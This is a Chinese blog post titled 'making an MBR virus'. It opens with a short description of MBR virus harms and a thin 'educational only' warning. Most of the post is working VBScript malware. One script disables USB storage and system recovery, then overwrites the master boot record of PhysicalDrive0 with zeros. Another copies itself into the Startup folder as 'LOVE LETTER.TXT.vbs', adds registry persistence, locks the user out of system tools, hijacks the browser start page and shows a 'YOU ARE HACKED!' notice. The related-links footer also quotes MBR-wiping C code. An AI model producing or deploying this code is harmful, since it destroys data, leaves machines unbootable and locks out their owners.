MBR病毒制作

已于 2024-08-15 17:54:55 修改
阅读量43 收藏
点赞数
文章标签: 网络
于 2024-08-15 16:40:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vliu612/article/details/141225953
版权

MBR 病毒的危害

MBR 病毒是一种潜伏在主引导扇区的病毒,其带来的危害不可小觑。所以这里的代码千万不要乱用!

首先,MBR 病毒可能导致硬盘坏道过多。硬盘的主引导扇区记录着硬盘最基本的信息,如分区信息等,当 MBR 病毒对这些信息进行篡改和破坏时,会影响硬盘的正常读写操作,增加硬盘的负担,从而导致坏道的产生。这不仅会影响数据的存储和读取,还可能造成数据的丢失和损坏。

其次,MBR 病毒会使系统出现异常。它可能干扰系统的正常启动过程,导致系统频繁蓝屏、死机等问题。即使尝试还原默认 BIOS 设置、格式化硬盘、重新分区以及重装系统,也可能无法解决这些问题。

再者,MBR 病毒会让电脑变得卡顿。它会占用系统资源,影响系统的运行速度,使得打开网页、运行程序等操作变得异常缓慢。

此外,MBR 病毒还可能导致杀毒软件被关闭,安全相关的网页无法打开,使得电脑失去有效的防护,更容易受到其他恶意软件的攻击。

而且,MBR 病毒还可能导致用户的游戏账号等被盗取,给用户造成经济损失和隐私泄露的风险。

MBR 病毒的传播途径较为广泛,包括通过不良网站提供的视频捆绑传播、网络游戏外挂捆绑传播等。这使得用户在不经意间就可能感染该病毒。

总之,MBR 病毒的危害极大,严重影响了电脑的正常使用和用户的数据安全。我们需要加强防范意识,避免感染此类病毒。

' 创建一个WScript.Shell对象
Set objShell = CreateObject("WScript.Shell")
 
' 定义注册表路径
strKeyPath = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR\"
 
' 设置启动类型为禁用
objShell.RegWrite strKeyPath & "Start", 4, "REG_DWORD"
 
' 输出成功消息
WScript.Echo "PE存储设备禁用。"
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR", 1, "REG_DWORD"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", 1, "REG_DWORD"
WScript.Echo "系统恢复选项已被禁用。"
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR", 1, "REG_DWORD"
WScript.Echo "系统还原点创建已被禁用。"
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableBkupRestore", 1, "REG_DWORD"
WScript.Echo "启动菜单中的备份和恢复选项已被禁用。"
' 警告:此代码仅供教育目的,实际操作可能导致系统不稳定或数据丢失。 
' 请勿在生产环境中使用。 
 
' 定义API函数
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
 
' 定义常量
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000
Const FILE_SHARE_READ = &H1
Const FILE_SHARE_WRITE = &H2
Const OPEN_EXISTING = &H3
 
' 主函数
Sub DeleteMBR()
    Dim hDisk As Long
    Dim buffer(511) As Byte ' MBR大小为512字节 
    Dim bytesWritten As Long
    
    ' 打开磁盘
    hDisk = CreateFile("\\.\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, 0, 0)
    If hDisk = -1 Then
        WScript.Echo "无法打开磁盘"
        Exit Sub
    End If
    
    ' 写入空数据到MBR
    If WriteFile(hDisk, buffer(0), 512, bytesWritten, ByVal 0&) = 0 Then
        WScript.Echo "写入失败"
    Else
        WScript.Echo "MBR已删除"
    End If
     
    ' 关闭磁盘句柄
    CloseHandle hDisk
End Sub
 
' 调用主函数
DeleteMBR

On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\LOVE LETTER.TXT.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\LOVE LETTER.TXT.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\Shell:Startup\LOVE LETTER.TXT.vbs")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","I LOVE YOU S0----"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","YOU ARE HACKED!"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://liudemin.myetang.com"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"

vliu612
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mbr病毒程序源代码分享2
m0_66194602的博客
01-07 1897
计算机病毒
mbr病毒程序源代码分享
m0_66194602的博客
01-06 1621
计算机病毒代码分享
MBR 病毒分析
Y_KolaFish_Y的博客
04-10 2689
转载自https://bbs.pediy.com/thread-121861.htm Author:Cryin MBR病毒分析 一、基础知识 1、 Windows启动过程 系统引导过程主要由以下几个步骤组成(以硬盘启动为例) 1、 开机; 2、 BIOS加电自检(POST—Power On Self Test),内存地址为0fff:0000; 3、 将硬盘第一个扇区(0头0道1扇区,也就是Boot...
自制的MBR病毒
ipjstt的博客
05-16 502
等级:上下return 0;
MBR病毒】实现与解决方案
tiantian520_tt——Python程序猿~
05-02 3879
复现 环境 Attacker OS: Windows 10 1909 X64 IDE: Dev-C++ 5.11 Filename: MBR.cpp Out Filename: MBR.exe Player OS: Windows XP SP2 Filename: MBR.exe 步骤 0.0.1 编译及拷贝 将以下代码输入进Dev-C++: #include<Windows.h> #include<stdio.h> #include<iostream> using na
C语言 简单 MBR 病毒 4行代码
Qode
07-08 2703
清除 MBR 使系统无法启动 #include <stdio.h> int main() { FILE *disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+"); char mbr[512] = {0}; fwrite(mbr, sizeof(mbr), 1, disk); fclose(mbr); return 0; } ...
一个能改写MBR病毒(可使电脑无法正常启动,并显示一串文字)
m0_66194602的博客
05-29 1031
这是一个能修改mbr病毒
病毒木马查杀实战第024篇:MBR病毒之编程解析引导区
Gleam的专栏
04-18 5727
前言        通过之前的学习,相信大家已经对磁盘的引导区有了充分的认识。但是我们之前的学习都是利用现成的工具来对引导区进行解析的,而对于一名反病毒工程师而言,不单单需要有扎实的逆向分析功底,同时也需要有很强的编程能力来解决实际问题。对于我们本次的课程来说,就需要大家亲自动手,利用程序来实现引导区的解析。这样做的目的,一方面是为了提高大家的编程能力,而另一方面则有助于我们更好地理解引导区
MEMZ木马病毒
热门推荐
ciudadcaa的博客
05-16 1万+
今天做蠕虫弄个memz病毒,把虚拟机搞崩了,重装了一下才解决,详细的了解了一下这种病毒。 MEMZ病毒: MEMZ病毒又称彩虹猫病毒,在运行时,该病毒会不断弹窗导致系统无法正常运行,如果尝试结束MEMZ进程或重启系统,桌面会弹出无数个包含“火星文”的消息对话框,随后计算机进入蓝屏状态。重启后,会在屏幕顶部出现一段英文(译文:你的电脑已经被MEMZ病毒损坏,现在一起来欣赏彩虹猫吧),最后出现一个跳跃的“彩虹猫”动画。 运行环境:虚拟机!!!! 源代码:Github上有源码,不过好像是越南语的注释,不太
启动盘制作工具,开源的
12-07
这种工具在系统崩溃、病毒攻击或需要进行硬件维护时尤其有用,因为它们能让我们在没有或无法使用硬盘驱动器上的操作系统时启动电脑。 描述中的“开源的”进一步强调了这个启动盘制作工具的独特性。开源软件通常由...
usb系统制作工具.rar
09-02
有时,为了确保引导成功,还需要采用特定的MBR或GPT分区表。 5. **写入ISO**:软件会将ISO映像文件的内容直接复制到USB驱动器上,同时添加必要的引导信息,使U盘具备引导功能。 6. **便携性**:使用USB系统的好处...
bootice引导制作工具
02-16
2. 引导修复:当计算机遇到引导问题,如MBR损坏或病毒感染时,BOOTICE能够提供有效的修复功能。它可以恢复被破坏的MBR,或者替换损坏的引导扇区,从而帮助用户快速恢复系统的正常启动。 3. 分区管理:BOOTICE还提供...
U盘启动制作工具
11-24
2. **写入引导扇区**:工具会将特定的引导程序(如GRUB、Syslinux或Windows的BOOTMGR)写入U盘的主引导记录(MBR),使得U盘具有引导计算机的能力。 3. **复制系统文件**:用户需要选择要安装的系统镜像文件(ISO)...
UD 制作工具
10-18
标题中的“UD 制作工具”指的是用于创建可引导USB驱动器(U盘)的软件,通常用于系统安装、数据恢复或防病毒等目的。这种工具利用特定的技术将U盘制作成一个不可删除的隐藏区域,称为UD区(Unremovable Data area)...
计算机网络面试题汇总
最新发布
Blocking The Sky
08-14 594
数字证书是指在互联网通讯中标志通讯各方身份信息的一个数字认证,人们可以在网上用它来识别对方的身份。它的出现,是为了避免身份被篡改冒充的。比如Https的数字证书,就是为了避免公钥被中间人冒充篡改。数字证书构成公钥和个人等信息,经过Hash摘要算法加密,形成消息摘要;将消息摘要拿到拥有公信力的认证中心(CA),用它的私钥对消息摘要加密,形成数字签名。公钥和个人信息、数字签名共同构成数字证书。
使用WebSocket实现一个简易的聊天室
qq_51321722的博客
08-14 299
其次,要有相关配置类以及Controller。我这里的框架是SpringBoot。首先,我们要有一个前端页面。
HAProxy基本配置及参数实操
Webston的博客
08-12 916
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
mpls vpn基础实验
wudongfang666的专栏
08-10 489
场景:异地两个站点通过mpls vpn骨干网络实现安全通讯虚拟路由转发 VRF ,相当于在设备内建立一条虚拟通道,一个vpn的实例(vrf)可以简单的理解为一台虚拟设备。拓扑图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值